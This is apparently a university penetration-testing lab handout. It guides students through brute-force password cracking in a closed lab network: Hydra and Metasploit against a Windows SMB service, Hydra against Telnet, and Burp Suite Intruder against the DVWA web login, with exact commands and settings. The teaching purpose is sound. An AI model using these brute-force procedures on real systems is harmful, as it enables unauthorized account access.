Lab 7

by


Lab-7: Attacking

There are many different kinds of cyberattacks, such as exploitation of a vulnerability by using a piece of malicious code, launching denial of service attack, password cracking, and social engineering attacks.

In this lab, you will launch three brute force password cracking attacks against three different protocols, 1) SMB, 2)HTTP, 3)Telnet.

Section-1: Brute Force Password Attack against a Remote Windows SMB Service (By using Hydra tool)

In this section, you will crack the password of the Administrator account of the Windows 7 Target computer (192.168.2.13) by using the Hydra tool on Kali Linux. Hydra is a brute force password cracker. You will use another tool named crunch to create a dictionary to be used by Hydra.

Assume that you did shoulder surfing and learned that the Administrator account on Windows 7 Target has “a”, “1”, “2”, “3”, “4”, and “5” characters. However, you couldn’t find the password with manual tries; you decided to use a brute force password cracker.

  • Log in to Kali Linux on the Netlab environment. Remember that the password of the root account was toor.
  • Open a terminal window.
  • You want to create a wordlist from the letters you learned in shoulder surfing. Use the crunch tool and type crunch 6 7 aA12345> my_word_list.txt in the terminal window. You included both lower and uppercase versions of “a” as you are not sure of which one is included in the password. You also indicated the minimum password length as 6 and the maximum length as 7. Crunch tool will generate a wordlist consisting of 941192 different possibilities of passwords that match the condition.
  • Now open the generated wordlist file by typing vi my_word_list.txt in the terminal window.
  • Press the page down button to see the list. Press Shift-gg to go to the end of the file.
  • Type colon character in vi and then type “set nu”. This command will show the line numbers at the beginning of each line.
  • Now search for aA12345, which is the password of the Windows 7 Administrator account. To search for aA12345, type /aA12345

Note the line number of aA12345, which is 140525.

SMB protocol does not like parallel connections; therefore, the Hydra tool does not perform parallel processing and tries one password at a given time.  On average, Hydra will check for 5800 passwords per minute. Therefore, it will take 24 minutes to find the password of the Administrator account. At this point, you will perform a trick and insert the password to the 6000th line.

  • In order to do that, press the Esc key and then type 6000 in vi, and then press Shift-g.
  • Press i and then press the Enter An empty line will be opened for you to type the password. Type in aA12345 here. Press Esc. Type:wq to save and quit.
  • Now, it is time to use Hydra to launch a brute force attack against the SMB service on Windows 7 Target computer. Type in hydra -l administrator -P my_word_list.txt smb://192.168.2.13

Take a screenshot of the brute force attack result screen once Hydra completed processing. (It should take no more than 5 minutes to complete)

Section-2: Brute Force Password Attack against a Remote Windows SMB Service (By using Metasploit Framework)

Metasploit Framework is a must-have tool for every pentester. You will use Metasploit frequently in the ISEC670 labs. Metasploit is included in Kali Linux.

  • Open a terminal window on Kali Linux on the Netlab environment.
  • Type in msfconsole to open Metasploit Framework
  • Type in search smb_login to find the path of the smb_login module.
  • Select the smb_login module by typing use auxiliary/scanner/smb/smb_login(This is the path you learned in the previous step)
  • Type in show options command to see the required parameters for the module.

Note: You can use view>shrink font to decrease the font size in the terminal window.

 

  • Set the target by typing set RHOSTS 192.168.2.13

 

  • Set the username by typing set SMBUSER administrator

 

  • Set the wordlist by typing set PASS_FILE /root/my_word_list.txt

 

  • Discard showing the detailed results by typing set VERBOSE false

 

  • Set the number of parallel process to 8 by typing set THREADS 8

Note: Do not set it to numbers higher than 8 as it may cause SMB service to crash

  • Run the brute force attack. It will take 1-2 minutes for Metasploit Framework to try the correct password in the wordlist.

Take a screenshot of the Metasploit result showing the username/password pair.

Section-3: Brute Force Password Attack against a Web Login Form

In this section, you will use the Burp Suite to perform a brute force attack against a web login form. Burp Suite has been used by application security testers to automate and control the web application security testing.

  • Stay in the Kali Linux on the Netlab environment.
  • Click on the Kali icon on the bottom left corner and type Firefox.
  • Click on the Firefox ESR icon on the start menu.
  • Configure the Proxy Settings of Firefox to have the web traffic directed to the Burp Suite.

Click the Firefox menu and then click Preferences

Scroll down to the bottom of the page and click the Settings button in the Network Settings section.

Select the Manual proxy configuration and type in the IP address as 127.0.0.1 and port number as 8080. (Burp Suite listens on 127.0.0.1:8080 by default). Click OK.

  • Open Burp Suite by clicking the Kali Linux icon at the bottom left corner, typing burp, and clicking the burp suite icon on the start menu.
  • Click Next while Temporary Project was selected.
  • Click Start Burp while Use Burp defaults was selected.
  • Switch to Firefox window. Visit the login page hosted at http://192.168.2.15/dvwa/login.php
  • Switch to Burp Suite, click on the Proxy tab, and click on the Forward button.
  • Switch to Firefox window. You will see the login window below. This is the “Damn Vulnerable Web Application” hosted on the OWASP BWA machine on Netlab.
  • At the login page, type admin as the username and type incorrect as the password. Click on the Login button.
  • Switch to Burp Suite, verify that the HTTP request is captured and also confirm that the Burp Suite has captured the username and password you typed.
  • Right-click anywhere at the bottom section and click on “Send to Intruder”

 

  • Click on Intruder Tab (1), and then click on the Positions Tab (2), and finally click on the Clear button (3).
  • Highlight the password value (1) and click on the Add button (2).

 

 

 

  • Click on Payloads Tab (1), and then Load button (2).
  • Navigate to /usr/share/wordlists/metasploit and click on http_default_pass.txt, and click Open (3)

 

  • Click on the Start Attack button on the top right. Click on OK for the message box about Community edition limitations.

 

  • Burp Suite tries all passwords in the dictionary file. The brute force attack will last around 15 seconds as there is a limited number of passwords in the file. Click on the Response tab, as shown in the figure below. All failed login attempts will be redirected to the login.php page. Successful logins will be redirected to the index.php page, as shown in the figure below.

Switch to the Request tab and take a screenshot of the Raw section where you see the username and password pair in the request traffic.

Section-4: Brute Force Password Attack against Telnet Protocol

In this lab, you will use the dictionary file you used in Section-3 to launch a brute force attack against Telnet service on Windows 7 Target computer.

  • Open a terminal window on Kali Linux on Netlab
  • Go to the path where word list is store by typing cd /usr/share/wordlists/metasploit
  • Type hydra -l admin -P http_default_pass.txttelnet://192.168.2.13
  • Take a screenshot of the terminal window.

Weekly Learning and Reflection

In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this lab. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you’re confused about. Questions asked here will be summarized and answered anonymously in the next class.